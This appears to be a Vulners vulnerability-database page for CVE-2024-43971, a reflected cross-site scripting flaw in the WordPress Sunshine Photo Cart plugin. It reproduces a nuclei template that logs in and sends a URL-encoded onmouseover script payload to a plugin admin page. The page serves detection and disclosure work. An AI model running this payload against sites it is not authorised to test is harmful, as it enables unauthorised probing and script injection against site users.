Lucene search
K

Sunshine Photo Cart <= 3.2.5 - Reflected Cross-Site Scripting

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 15 Views

Sunshine Photo Cart up to 3.2.5 has reflected cross site scripting; update to 3.2.6.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-43971
18 Sep 202403:20
circl
CVE
CVE-2024-43971
17 Sep 202423:32
cve
Cvelist
CVE-2024-43971 WordPress Sunshine Photo Cart plugin <= 3.2.5 - Cross Site Scripting (XSS) vulnerability
17 Sep 202423:32
cvelist
EUVD
EUVD-2024-40620
3 Oct 202520:07
euvd
NVD
CVE-2024-43971
18 Sep 202400:15
nvd
OSV
CVE-2024-43971
18 Sep 202400:15
osv
Patchstack
WordPress Sunshine Photo Cart Plugin <= 3.2.5 is vulnerable to Cross Site Scripting (XSS)
28 Aug 202400:00
patchstack
Patchstack
WordPress Sunshine Photo Cart plugin <= 3.2.5 - Cross Site Scripting (XSS) vulnerability
28 Aug 202409:03
patchstack
Positive Technologies
PT-2024-30834
17 Sep 202400:00
ptsecurity
RedhatCVE
CVE-2024-43971
5 Feb 202512:27
redhatcve
Rows per page
id: CVE-2024-43971

info:
  name: Sunshine Photo Cart <= 3.2.5 - Reflected Cross-Site Scripting
  author: 0xanis
  severity: medium
  description: |
    WP Sunshine Sunshine Photo Cart versions up to 3.2.5 contain a reflected cross-site scripting caused by improper input neutralization during web page generation, letting attackers execute malicious scripts in users' browsers, exploit requires attacker to craft malicious input.
  impact: |
    Attackers can execute malicious scripts in users' browsers, potentially stealing cookies, session tokens, or performing actions on behalf of users.
  remediation: |
    Update to Sunshine Photo Cart version 3.2.6 or later.
  reference:
    - https://wpscan.com/vulnerability/fa4cd831-40f2-4fa2-9439-b4d7fb94ec1e/
    - https://patchstack.com/database/vulnerability/sunshine-photo-cart/wordpress-sunshine-photo-cart-free-client-photo-galleries-for-photographers-plugin-3-2-5-cross-site-scripting-xss-vulnerability?_s_id=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-43971
    epss-score: 0.00593
    epss-percentile: 0.44072
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 2
    vendor: wpsunshine
    product: sunshine-photo-cart
    framework: wordpress
  tags: cve,cve2024,wordpress,wp-scan,wp-plugin,xss,sunshine-photo-cart,authenticated,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP+Cookie+check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains(tolower(all_headers), "wordpress_logged_in")'
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=sunshine&section=%22%20onmouseover=alert(document.domain)%3Bthis.remove()%3B%20style=position:fixed%3Bleft:0%3Btop:0%3Bwidth:100vw%3Bheight:100vh%3B HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "alert(document.domain);this.remove(); style=position:fixed;left:0;top:0;width:100vw;height:100vh;", "Sunshine Photo Cart")'
        condition: and
# digest: 4b0a00483046022100c9ab58214cea56613e721646fa544aa7292925a8c24944c4ac400580e778d48f02210082ffe2cf668a6d296ec98cc6987c61d4530f43d15593175a67b0355c928020db:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.16.1 - 7.1
EPSS0.00593
SSVC
15